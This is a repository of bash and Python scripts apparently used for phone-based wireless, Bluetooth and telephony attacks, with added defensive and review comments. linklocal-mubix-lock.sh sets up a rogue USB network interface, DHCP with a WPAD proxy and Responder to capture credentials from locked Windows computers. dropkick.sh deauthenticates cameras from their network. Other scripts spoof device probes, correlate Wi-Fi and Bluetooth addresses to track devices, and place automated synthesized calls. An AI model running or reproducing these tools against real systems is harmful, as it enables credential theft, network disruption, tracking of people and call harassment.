├── README.md
├── autox.sh
├── callsomeonesaysomething.sh
├── dropkick.sh
├── eddystonebeacon.sh
├── evildomains_dayof.pdf
├── find_bt_hciname.sh
├── house_hide.py
├── linklocal-mubix-lock.sh
├── mdkdowngradetest.sh
├── mubix-lock.sh
├── nmapme.sh
└── quickprobegrab.sh
/README.md:
--------------------------------------------------------------------------------
# GatosGuardianes #
### Scripts to automate certain tasks that may be a pain to execute w/ an "on screen" keyboard:

evildomains_dayof.pdf - Slides from "We're All Scriptkiddies: Evil Domains/Gatos Guardianes"

### Bluetooth
eddystonebeacon.sh - generate eddystone URL beacon (wip)

find_bt_hciname.sh - check for bluetooth addy (mac+1) via wifi mac

### Local exploit
mubix-lock.sh / linklocal-mubix-lock.sh = variations on sniffing locked winboxen

### Wireless
autox.sh - sniff for probes, then try to cross reference 'em for bluetooth names

quickprobegrab.sh - quick pcap grab of probes in an area for later dissecting/ID

mdk3me.sh - spew out wifi-ssids (from test file)

karmacheck.py - spew out random wifi probes

mdkdowngradetest.sh - test downgrades on wifi

nmapme.sh - nmap -sP local network

house_hide.py - Spew out random probes from fake IoT devices

paper-- - scripts to detect HP printers w/ wireless direct on, and do stuff

### Video
dropkick.sh - Detect and deauth wireless cameras

### Voice
callsomeonesaysomething.sh - Call someone, spew voice-synth message

ringmybell.sh - Call a phone # over and over

asterisk minimal install - Minimal install that'll work on nethunter N5

- required for "callsomeonesaysomething", others.
--------------------------------------------------------------------------------
/autox.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# autox
# .. sniff for X seconds for probes, use that list to
# inquire device names via bluetoofs.
# - des
#
# Flow: put $INT into monitor mode, capture probe requests for $TIMEINSECONDS
# with tcpdump, summarise the capture with tshark, then (once a Bluetooth
# adapter is present) hand each source MAC to ./find_bt_hciname.sh.
# Needs root plus airmon-ng, tcpdump, tshark and bluez; everything is written
# under ./captures, which this script does not create.
#
# Defensive note: the probe requests collected here are sent in the clear by
# any client looking for remembered networks; client-side MAC randomisation and
# pruning auto-join networks are what shrink this exposure.

DATE=`date +%Y%m%d-%H%M%S`
FILE="captures/$DATE.pcap"
# NOTE(review): bash parses "$DATE_probe_req_beacons" as a single variable name
# (underscore is an identifier character), which is unset, so both of these
# expand to "captures/.txt" rather than a date-stamped file name.
OUTPUTFILE="captures/$DATE_probe_req_beacons.txt"
BTOUTPUTFILE="captures/$DATE_bluetooth_hcifo.txt"
INT="wlan1"
MONINT="wlan1mon"
BLUEINT="hci0"

TIMEINSECONDS=$1

# Empty when ifconfig prints nothing for $INT (interface absent).
INTCHECK=`ifconfig $INT | grep $INT`

# Note: exits with status 0 even though nothing was captured.
if [ -z "$INTCHECK" ]; then
  echo " "
  echo "AutoX says: I need an external wifi interface. Brah."
  exit 0
fi

echo "-----------------------------"
echo " .. autox"
echo "-----------------------------"
echo
echo "Sniff for probe reqs for X seconds,"
echo then try to figure out bluetooth interface
echo and get device name.
echo

# No argument: fall back to a 30 second capture.
if [[ $# -eq 0 ]] ; then
  TIMEINSECONDS="30"
  echo " "
  echo "$0 -- usage: $0 TimeToRunInSeconds"
  echo "AutoX says: ... defaulting to $TIMEINSECONDS seconds, brah."
  echo ""
fi

echo "-----------------------------"
echo Starting up monitor on $INT
echo "-----------------------------"
ifconfig $INT
airmon-ng start $INT
echo "-----------------------------"
echo Capturing for $TIMEINSECONDS seconds to $FILE ...
echo "-----------------------------"
echo
# -G/-W 1: rotate once after $TIMEINSECONDS and stop; -s 256 keeps only the
# first 256 bytes of each frame; the BPF filter keeps probe requests only.
tcpdump -G $TIMEINSECONDS -W 1 -l -e -i $MONINT -s 256 -w $FILE \
  type mgt subtype probe-req

echo "-----------------------------"
echo Cleaning up $MONINT..
echo "-----------------------------"
echo
airmon-ng stop $MONINT
echo "-----------------------------"
echo "Cleaning up list collected."
echo "-----------------------------"
echo
# Display filter: type_subtype 8 = beacon, 4 = probe request, 5 = probe
# response (the capture above already holds probe requests only). Output is
# count-sorted, most frequent first.
tshark -r $FILE -Y 'wlan.fc.type_subtype eq 8 or wlan.fc.type_subtype eq 4 or wlan.fc.type_subtype eq 5' \
  -T fields -e wlan.fc -e wlan.sa_resolved -e wlan.sa -e wlan.da_resolved -e wlan.da -e wlan_mgt.ssid \
  | sort | uniq -c | sort -k 1 -n -r > $OUTPUTFILE
echo
echo "-----------------------------"
echo "Checking for bluetooth names..."
echo "-----------------------------"
echo
# NOTE(review): the "$" before the backtick is a stray literal, so the tested
# word is never empty and this prompt is printed unconditionally.
if [ -n $`hcitool dev | awk {'print $1'} | grep -i hci` ]; then echo "Remove the WIFI interface and plug in a bluetooth int."; fi
# Block until hcitool lists at least one hciN device.
until [ `hcitool dev | awk {'print $1'} | grep -i hci` ]; do sleep 1; done
echo " "
echo "Sweet, I have a bluetooth interface!"
echo "Checking for Bluetooth interfaces/names..."

# Column 4 of the summary (count, wlan.fc, wlan.sa_resolved, wlan.sa) is the
# raw source MAC, assuming tshark emits the fields in the order requested.
for DEVICE in `cat $OUTPUTFILE | awk {'print $4'} | sort | uniq`; do
  ./find_bt_hciname.sh $DEVICE $BLUEINT >> $BTOUTPUTFILE
done
--------------------------------------------------------------------------------
/callsomeonesaysomething.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Call someone, SAY SOMETHING.
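# - david.e.switzer@gmail.com - mar 10 2017
# requires: asterisk festival flite
#
# Usage: callsomeonesaysomething.sh PHONE TRUNK "MESSAGE"
#   Renders MESSAGE to speech with text2wave, transcodes it with lame into the
#   Asterisk sounds directory, then drops an Asterisk call file into the
#   outgoing spool so Asterisk dials SIP/TRUNK/PHONE and plays the audio.
# Exit status: 0 on success (or when usage is printed), 1 when a required tool
# is missing or a step fails. Runs as root (writes under /var/lib/asterisk and
# /var/spool/asterisk).
#
# Note: argv, MESSAGE included, is visible to other local users via ps; do not
# pass anything sensitive on the command line.

# DEFAULT STUFFS
ASTERISKSOUNDS="/var/lib/asterisk/sounds/en"
ASTERISKCALLS="/var/spool/asterisk/outgoing"
# %M (minute), not %m (month): with %m every call inside the same hour shared a
# stamp and overwrote the previous call's audio and call file.
DATE=$(date +%Y%m%d_%H%M%S)
YESTERDAY=$(date --date yesterday +%Y%m%d)
PHONE=$1; TRUNK=$2; MESSAGE=$3
NONE='\033[00m'; WHITE='\033[01;37m'; BOLD='\033[1m'; UNDERLINE='\033[4m'

# All three arguments are needed to build a valid call file.
if [[ $# -lt 3 ]] ; then
  echo -e "========================================================================="
  echo -e "${BOLD}${WHITE}$0${NONE} - d.switzer"
  echo -e "========================================================================="
  echo -e ""
  echo -e " usage:"
  echo -e " $0 phone# trunkname words_in_quotes_if_more_than_one"; echo -e ""
  echo -e " ex: $0 18136660666 TESTtrunk \"This is a test\""
  exit 0
fi

# command -v instead of `[ ! -f \`which text2wave\` ]`: with the tool absent,
# `which` printed nothing and the test collapsed to `[ ! -f ]`, which is false,
# so the missing-tool branch never fired.
if ! command -v text2wave >/dev/null 2>&1; then
  echo "missing: text2wave -- needed to create audio files - install festival and flite via apt-get"; exit 1
fi
if ! command -v lame >/dev/null 2>&1; then
  echo "missing: lame -- needed to transcode audio files"; exit 1
fi

# Remove yesterday's renders. The glob is expanded into an array first; the old
# `[ -f $ASTERISKSOUNDS/$YESTERDAY* ]` errored with "too many arguments" as soon
# as more than one file matched.
shopt -s nullglob
OLDSOUNDS=("$ASTERISKSOUNDS/$YESTERDAY"*)
shopt -u nullglob
if (( ${#OLDSOUNDS[@]} > 0 )); then
  echo -e "======================================"
  echo -e "${BOLD}${WHITE}Cleaning up sounds from yesterday...${NONE}"
  rm -f -- "${OLDSOUNDS[@]}"
fi

echo -e ==================
echo -e "${BOLD}${WHITE}Creating audio..${NONE}"
echo -e ==================
WAV="$ASTERISKSOUNDS/$DATE.wav"
MP3="$ASTERISKSOUNDS/$DATE.mp3"
printf '%s\n' "$MESSAGE" | text2wave > "$WAV" || { echo "text2wave failed" >&2; exit 1; }
# -b 32 / --resample 8 / -a: 32 kbit mono at 8 kHz, what Asterisk plays back.
lame -b 32 --resample 8 -a "$WAV" "$MP3" || { echo "lame failed" >&2; exit 1; }
# Only the two files created here change owner; the old `chown .../*` re-owned
# every sound file in the directory on each run.
chown asterisk:asterisk "$WAV" "$MP3"

echo -e ======================
echo -e "${BOLD}${WHITE}Creating call file..${NONE}"
echo -e ======================
# Build the call file under a mktemp name rather than the predictable
# /tmp/$DATE.call (which any local user could pre-create or symlink), then move
# it into the spool in one step so Asterisk never reads a half-written file.
CALLFILE=$(mktemp "${TMPDIR:-/tmp}/call.XXXXXX") || { echo "mktemp failed" >&2; exit 1; }
{
  echo "Channel: SIP/$TRUNK/$PHONE"
  echo "Application: Playback"
  echo "Data: $ASTERISKSOUNDS/$DATE"
} > "$CALLFILE"

echo -e ======================
echo -e "${BOLD}${WHITE}Sending to ASTERISK..${NONE}"
echo -e ======================
# mktemp creates the file 0600 root-owned; hand it to the asterisk user (as the
# sound files are) so the spool reader can open and delete it.
chown asterisk:asterisk "$CALLFILE"
mv "$CALLFILE" "$ASTERISKCALLS/$DATE.call"

--------------------------------------------------------------------------------
/dropkick.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# DROPKICK.SH
#
# Detect and Disconnect the DropCam and Withings devices some people are using to
# spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh:
#
# http://julianoliver.com/output/log_2014-05-30_20-52
#
# This script was named by Adam Harvey (http://ahprojects.com), who also
# encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi,
# etc) and the aircrack-ng suite. I put 'beep' in there for a little audio
# notification. Comment it out if you don't need it.
#
# See also http://plugunplug.net, for a plug-and-play device that does this
# based on OpenWrt. Code here:
#
# https://github.com/JulianOliver/CyborgUnplug
#
# Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows:
#
# sudo ./dropkick.sh

#
## - modified by des twitter.com/violentlydave
## - added axis, nest camera

shopt -s nocasematch # Set shell to ignore case
shopt -s extglob # For non-interactive shell.

readonly NIC=$1 # Your wireless NIC
readonly BSSID=$2 # Network BSSID (AirBnB WiFi network)
readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
# MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not
# present.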
# nest labs = 18B430
# dropcam = 308CFB
# withings = 0024E4
# axis communications = ACCC8E 00408C

readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings
readonly POLL=30 # Check every 30 seconds
readonly LOG=/var/log/dropkick.log

# Defensive note: the deauthentication frames sent in the loop below are
# ordinary unprotected 802.11 management frames. An AP and camera that
# negotiate 802.11w (Protected Management Frames) drop them, and a wireless IDS
# sees this loop as a periodic deauth source aimed at the network's BSSID.

airmon-ng stop mon0 # Pull down any lingering monitor devices
airmon-ng start $NIC # Start a monitor device

# Poll loop: every $POLL seconds ARP-scan the local subnet on $NIC, extract
# anything shaped like a MAC address, and compare each one with $GGMAC.
while true;
do
  for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
    '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
  do
    if [[ "$TARGET" == "$GGMAC" ]]
    then
      # Audio alert
      beep -f 1000 -l 500 -n 200 -r 2
      # Both events are appended to $LOG (a root-owned path under /var/log).
      echo "WiFi camera discovered: "$TARGET >> $LOG
      aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
      echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG
      echo '
__ __ _ __ __
___/ /______ ___ / /__ (_)___/ /_____ ___/ /
/ _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ /
\_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/
/_/

'
    else
      echo $TARGET": is not a DropCam or Withings device. Leaving alone.."
    fi
  done
  # Printed after every pass, whether or not a match was handled above.
  echo "None found this round."
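sleep $POLL
done
airmon-ng stop mon0

--------------------------------------------------------------------------------
/eddystonebeacon.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# - advertise out eddystone beacon
#
# https://github.com/google/eddystone/tree/master/eddystone-url
#
# Advertising data handed to HCI LE_Set_Advertising_Data (OGF 0x08, OCF 0x0008):
#   <len>  02 01 06          flags
#          03 03 aa fe       complete list of 16-bit service UUIDs: Eddystone (FEAA)
#          <svclen> 16 aa fe service data for FEAA
#          10                frame type: Eddystone-URL
#          00                TX power at 0 m (0 dBm)
#          AA                URL scheme prefix
#          BB ..             URL body, one hex byte per character
#          CC                URL expansion code
#          00 ..             zero padding up to the 31-byte field
#
# AA= URL scheme,
# 00 = http://www., 01 = https://www., 02 = http://, 03 = https://
# BB = addy in hex
# CC = url encode
# 00=.com/, 01=.org/, 02=.edu/, 03=.net/, 04=.info/, 05=.biz/, 06=.gov/,
# 07=.com, 08=.org, 09=.edu, 10=.net, 11=.info, 12=.biz, 13=.gov,
# (that CC list is decimal; hcitool takes hex bytes, so on the command line
# .net is 0a, .info 0b, .biz 0c and .gov 0d)
#
# Reference frame for https://webgazer.org:
#sudo hcitool -i hci0 cmd 0x08 0x0008 17 02 01 06 03 03 aa fe 0f 16 aa fe 10 00 03 77 65 62 67 61 7a 65 72 08 00 00 00 00 00 00 00 00
# XX [webgazerINhex ] [08=.org]

INT="hci0"
HOST="webgazer"
DOM=".org"
SCHEME="03"   # https://

# Bring the interface up. Interface state belongs to hciconfig; `hcitool hci0
# up` is not an hcitool subcommand and only printed hcitool's usage text.
sudo hciconfig "$INT" up

# Set bluetooth dev to "advertise /non-connectable"
sudo hciconfig "$INT" leadv 3

# Map the domain suffix to its Eddystone-URL expansion byte.
case "$DOM" in
  .com/) EXP=00 ;;
  .org/) EXP=01 ;;
  .edu/) EXP=02 ;;
  .net/) EXP=03 ;;
  .info/) EXP=04 ;;
  .biz/) EXP=05 ;;
  .gov/) EXP=06 ;;
  .com) EXP=07 ;;
  .org) EXP=08 ;;
  .edu) EXP=09 ;;
  .net) EXP=0a ;;
  .info) EXP=0b ;;
  .biz) EXP=0c ;;
  .gov) EXP=0d ;;
  *) printf 'no eddystone expansion code for %s\n' "$DOM" >&2; exit 1 ;;
esac

# Hex-encode the host. printf emits no trailing newline: the old `echo $HOST |
# od` included echo's newline as a trailing 0a byte, pushing the frame to 32
# bytes, and `grep 0000000` kept only od's first 16-byte row.
HOSTHEX=$(printf '%s' "$HOST" | od -An -v -t x1 | tr -d '\n')
read -r -a HOSTBYTES <<< "$HOSTHEX"
N=${#HOSTBYTES[@]}

# Eddystone-URL allows at most 17 bytes of encoded URL after the scheme byte,
# one of which is the expansion code.
if (( N + 1 > 17 )); then
  printf 'host "%s" is too long for an Eddystone-URL frame (max 16 bytes)\n' "$HOST" >&2
  exit 1
fi

# Length bytes are derived from the host length instead of being hard-coded for
# an 8-byte host: service data = 7 fixed bytes + host, total = 15 + host, and
# the rest of the 31-byte field is zero padded. For "webgazer" this reproduces
# the reference frame above (17 / 0f / eight 00s).
SVCLEN=$(printf '%02x' $((7 + N)))
ADVLEN=$(printf '%02x' $((15 + N)))
PAD=()
for ((i = 0; i < 16 - N; i++)); do PAD+=(00); done

# Get yo beacon on!
sudo hcitool -i "$INT" cmd 0x08 0x0008 "$ADVLEN" 02 01 06 03 03 aa fe "$SVCLEN" 16 aa fe 10 00 "$SCHEME" "${HOSTBYTES[@]}" "$EXP" "${PAD[@]}"

--------------------------------------------------------------------------------
/evildomains_dayof.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/violentlydave/GatosGuardianes/d6070d779a937d1fd7b52de1142e5dcdd8dc1a6b/evildomains_dayof.pdf
--------------------------------------------------------------------------------
/find_bt_hciname.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# http://github.com/violentlydave
#
# ZGF2aWQgRE9UIGUgRE9UIHN3aXR6ZXIgYVQgICBHRWVlZU1BSUx6IERBV1QgQ09NCg==
#
# real: l2ping -c 1 60:BE:B5:83:EE:1F
# l2ping -c 1 60:BE:B5:83:EE:1A; echo $?
# take last octet, add one (hex), try pinging
# if ping works, that = bluetooth
#
#

# Comment out if you want quiet, uncomment for noise.
VERBOSE="1"

function log () {
  if [ ! -z $VERBOSE ]; then
    echo "$@"
  fi
}

if [[ $# -eq 0 ]] ; then
  echo ""
  echo " $0 - script to find bluetooth MAC addy via off-by-one"
  echo ""
  echo " usage:"
  echo " $0 WIFIMACADDRESS [optional HCI dev name, ex: hci1]"
  echo ""
  exit 1
fi

HCIDEV=$2
if [ "$2" == "" ]; then HCIDEV="hci0"; fi


# did ya know BC hates HEX w/ lowercase?.. yeah I didn't either.
BLUETOOTHMAC=`echo $1 | tr '[:lower:]' '[:upper:]'`

# because math. sloppy, sloppy math.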
# Octet arithmetic: bc reads the last octet as hex (ibase=16), the neighbours
# are computed in decimal with expr, then rendered back as hex (obase=16).
FIRSTFIVE=`echo $BLUETOOTHMAC | cut -d \: -f 1,2,3,4,5`
LAST=`echo $BLUETOOTHMAC | cut -d \: -f 6`
LASTDEC=`echo "ibase=16; $LAST" | bc`
DECPLUSONE=`expr $LASTDEC + 1`
DECMINUSONE=`expr $LASTDEC - 1`
# NOTE(review): bc prints no leading zero (0x0A comes back as "A") and does not
# wrap at a byte boundary (FF+1 is "100", 00-1 is "-1"), so the trial addresses
# built from those values are not well-formed BD_ADDRs.
HEXPLUSONE=`echo "obase=16; $DECPLUSONE" | bc`
HEXMINUSONE=`echo "obase=16; $DECMINUSONE" | bc`

# Trial 1: Wi-Fi MAC + 1. hcitool issues a remote-name request to the guessed
# address; a name in the output means a classic-Bluetooth radio answered.
#
# Defensive note: a remote-name request is answered by a paged device whether
# or not it is set discoverable, so on the client side only powering the radio
# off (not merely hiding it) prevents this correlation.
TRIALMAC=$FIRSTFIVE":"$HEXPLUSONE

echo $BLUETOOTHMAC : $HEXPLUSONE
hcitool -i $HCIDEV name $TRIALMAC

# Trial 2: Wi-Fi MAC - 1.
TRIALMAC=$FIRSTFIVE":"$HEXMINUSONE
echo $BLUETOOTHMAC : $HEXMINUSONE
hcitool -i $HCIDEV name $TRIALMAC
--------------------------------------------------------------------------------
/house_hide.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#
# house_hide.py - d.e.switzer
#
# spew out fake wifi probes from IoT devices, cloud the area
#
# MACS USED / Source / Basic info:
## Thermostats
# 64:16:66:XX:XX:XX # Nest
# 18:B4:30:XX:XX:XX # Nest
# 44:61:32:XX:XX:XX # Ecobee
#
## Helpers
# 74:C2:46:XX:XX:XX # Amazon
# 68:54:FD:XX:XX:XX # Amazon Echo
# F4:F5:D8:XX:XX:XX # Google Home? (Check J.E.)
#
## TV stuffs
# 00:04:4B:XX:XX:XX # Nvidia Shield
# B8:A1:75:XX:XX:XX # Roku
#
## Power Control
# 60:01:94:XX:XX:XX # Cheapo powerplugs
# A0:20:A6:XX:XX:XX # Cheapo Powerplugs
# 5C:CF:7F:XX:XX:XX # Cheapo Powerplugs
# 50:C7:BF:XX:XX:XX # TPlink POwer Plugs
#
## Misc Control
# 00:17:88:XX:XX:XX # Phillips Hue Bridge
# B0:72:BF:XX:XX:XX # Wink
#
# Python 2 source (print statements, string.lowercase, str used as bytes).
#
# Each entry is "<label>#<OUI>"; the main loop below appends three random
# octets to the OUI to form a full source MAC for every probe request sent.
#
# Defensive note: an inventory built only from probe-request source MACs cannot
# tell these frames from real devices; corroborating with association or data
# frames is what separates a chattering OUI from a station that is present.

import random
macs = ['Nest#64:16:66', 'Nest#18:B4:30', 'Ecobee#44:61:32', 'Amazon Device#74:C2:46', 'Amazon Echo#68:54:FD', 'NVidia Shield#00:04:4B', 'Roku#B8:A1:75', 'Cheapo Powerplug#60:01:94', 'Cheapo Powerplug#A0:20:a6', 'Cheapo Powerplug#5C:CF:7F', 'TPLink Power Plug#50:C7:BF', 'Wink#B0:72:BF']
random.shuffle(macs)

import argparse,string, logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# NOTE(review): `os` is used in Scapy80211.__init__ but never imported here;
# presumably it reaches scope through this star import -- confirm.
from scapy.all import *
from random import randint
from time import sleep

__author__ = 'd.e.switzer'

def get_me_some_args():
    # Parse -i/-m/-c/-s and return (interface, moninterface, channel, ssid).
    # Only -i is required; channel is returned but never applied below.
    parser = argparse.ArgumentParser(
        description='Script sends out randomized 802.11 probe requests.')
    parser.add_argument(
        '-i', '--interface', type=str, help='Wifi interface', required=True)
    parser.add_argument(
        '-m', '--moninterface', type=str, help='Wifi monitor interface', required=False, default='mon0')
    parser.add_argument(
        '-c', '--channel', type=str, help='Channel #', required=False, default='11')
    parser.add_argument(
        '-s', '--ssid', type=str, help='SSID to broadcast probes for', required=False, default='Linksys')
    args = parser.parse_args()
    interface = args.interface
    moninterface = args.moninterface
    channel = args.channel
    SSID = args.ssid
    return interface,moninterface,channel,SSID

interface,moninterface,channel,SSID = get_me_some_args()

conf.iface = interface
# NOTE(review): this shadows the builtin `int` for the rest of the module.
int = interface
hw = interface
# monint is assigned but not read; Scapy80211 hard-codes 'mon0' instead.
monint = moninterface
mac = ''

def randomssid(length):
    # Random lowercase SSID of the given length (its only caller is commented out).
    return ''.join(random.choice(string.lowercase) for i in range(length))

class Scapy80211():
    # Builds and sends an 802.11 probe request from a chosen source MAC.
    # Default argument values are bound once at class creation: `int` is the
    # parsed interface and `mac` is '' at that point.
    def __init__(self,intf=int,ssid=SSID,source=mac,bssid='ff:ff:ff:ff:ff:ff'):
        self.rates = "\x03\x12\x96\x18\x24\x30\x48\x60"
        self.ssid = ssid
        self.source = source
        self.bssid = bssid
        self.intf = intf
        # Monitor interface name is fixed here; the -m option does not reach it.
        self.intfmon = 'mon0'
        # sendp() below transmits on conf.iface, i.e. on the monitor interface.
        conf.iface = self.intfmon

        # create monitor interface using iw
        # Runs on every instantiation (once per device in the main loop); a
        # second "interface add" for an existing mon0 fails quietly because
        # output is discarded and os.system's return code is not checked.
        cmd = '/sbin/iw dev %s interface add %s type monitor >/dev/null 2>&1' \
            % (self.intf, self.intfmon)
        cmdintup = '/sbin/ifconfig %s up > /dev/null 2>&1' % (self.intfmon)
        try:
            os.system(cmd)
            os.system(cmdintup)
        except:
            raise

    def ProbeReq(self,count=1,ssid=SSID,dst='ff:ff:ff:ff:ff:ff'):
        # Send `count` probe requests (Dot11 type 0 / subtype 4) for `ssid`
        # to `dst`, 0.1 s apart. Returns None; exceptions from sendp propagate.
        if not ssid: ssid=self.ssid
        param = Dot11ProbeReq()
        essid = Dot11Elt(ID='SSID',info=ssid)
        # Only rate4 is used; rate1-3 are alternatives left for reference.
        rate1 = "\x02\x04\x0b\x16"
        rate2 = "\x82\x84\x0b\x16\x24\x30\x48\x6c"
        rate3 = "\x03\x12\x96\x18\x24\x30\x48\x60"
        rate4 = "\x82\x84\x8b\x96\x12\x24\x48\x6c"
        rates = Dot11Elt(ID='Rates',info=rate4)
        # dsset and erpinfo are built but not part of `pkt` below.
        dsset = Dot11Elt(ID='DSset',info=chr(1))
        erpinfo = Dot11Elt(ID='ERPinfo',info='\x00')
        esrates = Dot11Elt(ID='ESRates',info='\x0c\x18\x30\x60')
        tim = Dot11Elt(ID='TIM',info='\x00\x01\x00\x00')

        # Vendor specific extras. Modeled after a Realtek device. Add
        # "/vendor" to the "pkt" definition below if you'd like to use them.
        #
        # These values are easy to find in WireShark under the "tagged options" for
        # a wireless packet, and the variables below are named to be close or identical
        # to how they are named in WireShark.
        #
        uuidr = "\x10\x48\x00\x10\x52\x61\x6c\x69\x6e\x6b\x57\x50\x53\x2d\xac\x81\x12\xa1\xa3\x74"
        primarydevtype = "\x10\x54\x00\x08\x00\x01\x00\x50\xf2\x04\x00\x01"
        rfbands = "\x10\x3c\x00\x01\x01"
        assocstate = "\x10\x02\x00\x02\x00\x00"
        configerror = "\x10\x09\x00\x02\x00\x00"
        devicepassid = "\x10\x12\x00\x02\x00\x00"
        devicename = "\x10\x11\x00\x0d\x52\x61\x6c\x69\x6e\x6b\x20\x43\x6c\x69\x65\x6e\x74"
        manufacturer = "\x10\x21\x00\x18\x52\x61\x6c\x69\x6e\x6b\x20\x54\x65\x63\x68\x6e\x6f\x6c\x6f\x67\x79\x2c\x20\x43\x6f\x72\x70\x2e"
        modelname = "\x10\x23\x00\x17\x52\x62\x6c\x6e\x6b\x20\x57\x69\x72\x65\x6c\x65\x73\x73\x20\x41\x64\x61\x70\x74\x65\x72\x10"
        modelnum = "\x10\x24\x00\x06\x52\x54\x32\x38\x30\x30"
        vendorextension = "\x10\x49\x00\x06\x00\x37\x2a\x00\x01\x20"
        hdcap = "\x2d\x1a\x6e\x01\x02\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        hdcap2 = "\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00"
        extendedcap = "\x7f\x01\x01"
        vendor = Dot11Elt(ID=221,len=167,info="\x00\x50\xf2\x04\x10\x4a" +
            "\x00\x01\x10\x10" + "\x3a\x00" + "\x01\x00\x10\x08" + "\x00\x02" + "\x22\x8c" +
            uuidr + primarydevtype + rfbands + assocstate + configerror + devicepassid + devicename +
            manufacturer + modelname + modelnum + vendorextension +hdcap + hdcap2 + extendedcap)

        # Frame layout: RadioTap / management frame / probe-req body / SSID /
        # rates / extended rates / TIM.
        pkt = RadioTap()\
            /Dot11(type=0,subtype=4,addr1=dst,addr2=self.source,addr3=self.bssid)\
            /param/essid/rates/esrates/tim

        print 'ProbeReq: SSID=[%s]|src=[%s]|count=%d' % (ssid,self.source,count)
        try:
            sendp(pkt,count=count,inter=0.1,verbose=0)
        except:
            raise

print "-------------------------------------------------"
print " House Hide - send out fake home IoT probes"
print "-------------------------------------------------"
print " .. hit control-C to stop the madness"
print "-------------------------------------------------"
print "Sending probe requests via " + hw + "..."
print "-------------------------------------------------"

# Main loop: cycle through the shuffled list forever, one probe per device,
# sleeping 1-4 s between devices. Ctrl-C is the only way out.
while True:
    for toy in macs:
        data = toy.split("#")
        devicename = data[0]
        mac = data[1]
        yay = ":"
        # Random lower three octets appended to the vendor OUI.
        lastpart = "%02x:%02x:%02x" % (random.randint(0, 255),random.randint(0, 255),random.randint(0, 255),)
        seq = (mac, lastpart)
        testmac = yay.join ( seq )
        # SSID = randomssid(32)
        print "I'm a",devicename
        # A fresh object per device re-runs the iw/ifconfig setup in __init__.
        sdot11 = Scapy80211(intf=int,source=testmac,ssid=SSID)
        # ProbeReq() returns None, so `packet` is never a packet.
        packet = sdot11.ProbeReq()
        sleepy=randint(1,4)
        print ".. sleeping", sleepy
        print " "
        sleep(sleepy)

--------------------------------------------------------------------------------
/linklocal-mubix-lock.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# TODO: Add checks for packages
#
# apt-get install -y python git python-pip python-dev screen sqlite3
# pip install pycrypto
# cd /root
# git clone https://github.com/spiderlabs/responder
#

#
# TODO: Add check for RNDIS interface
#
echo "Bringing down USB"
# We have to disable the usb interface before reconfiguring it
echo 0 > /sys/devices/virtual/android_usb/android0/enable
echo rndis > /sys/devices/virtual/android_usb/android0/functions
echo 224 > /sys/devices/virtual/android_usb/android0/bDeviceClass
echo 6863 > /sys/devices/virtual/android_usb/android0/idProduct
echo 1 > /sys/devices/virtual/android_usb/android0/enable

echo "Check for changes"
# Check whether it has applied the changes
cat /sys/devices/virtual/android_usb/android0/functions
cat /sys/devices/virtual/android_usb/android0/enable

echo "rndis0 interface:"
ifconfig rndis0

echo "Setting IP 
for rndis0"
ip addr flush dev rndis0
# - Use linklocal/26, so if target comes up in a weird state
# and attempts linklocal.. we can talk back ;)
#ip addr add 10.0.0.201/24 dev rndis0
# NOTE(review): the comment above says /26 but the address is added with /16;
# the dhcpd subnet below is also 169.254.0.0/16, so address and DHCP scope agree.
ip addr add 169.254.1.201/16 dev rndis0
ip link set rndis0 up

# dhcpd leases a 169.254.10.x address to the attached host, names this device
# as its router and DNS server, and pushes a WPAD URL through DHCP option 252
# so the host's proxy auto-discovery fetches wpad.dat from here.
#
# Defensive note, host side: disabling WPAD/automatic proxy detection, turning
# off LLMNR and NetBIOS name resolution, requiring SMB signing, and blocking
# installation of new USB network-class devices while the session is locked
# each cut this path; a new NIC appearing with a 169.254.x gateway while the
# screen is locked is the event worth alerting on.
echo "Creating DHCP.conf"
cat << EOF > /root/mubix-dhcpd.conf

option domain-name "domain.local";
option domain-name-servers 169.254.1.201;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wpad
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
subnet 169.254.0.0 netmask 255.255.0.0 {
range 169.254.10.0 169.254.10.100;
option routers 169.254.1.201;
option local-proxy-config "http://169.254.1.201/wpad.dat";
}
EOF

echo "Remove previous dhcpd leases"
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases

echo "Starting DHCPD server"
/usr/sbin/dhcpd -cf /root/mubix-dhcpd.conf

# The heredoc is unquoted, so bash expands "$USER_" (underscore included) when
# writing the file; that variable is not set by default, so the log name
# begins "screenlog_.". The %H/%n/... escapes are screen's own and are left
# for screen to expand.
echo "Creating SCREEN logger"
cat << EOF > /root/.screenrc
# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log
EOF
mkdir -p /root/logs

# Responder runs detached in a screen session named "responder", listening on
# rndis0; the options are Responder's own (see its README). The session's
# transcript goes to /root/logs via the .screenrc above.
echo "Starting Responder"
/usr/bin/screen -dmS responder bash -c 'cd /root/Responder/; python Responder.py -I rndis0 -v -f -w -r -d -F'

# TODO: Kill Responder, bring rndis0 down
killall dhcpd

--------------------------------------------------------------------------------
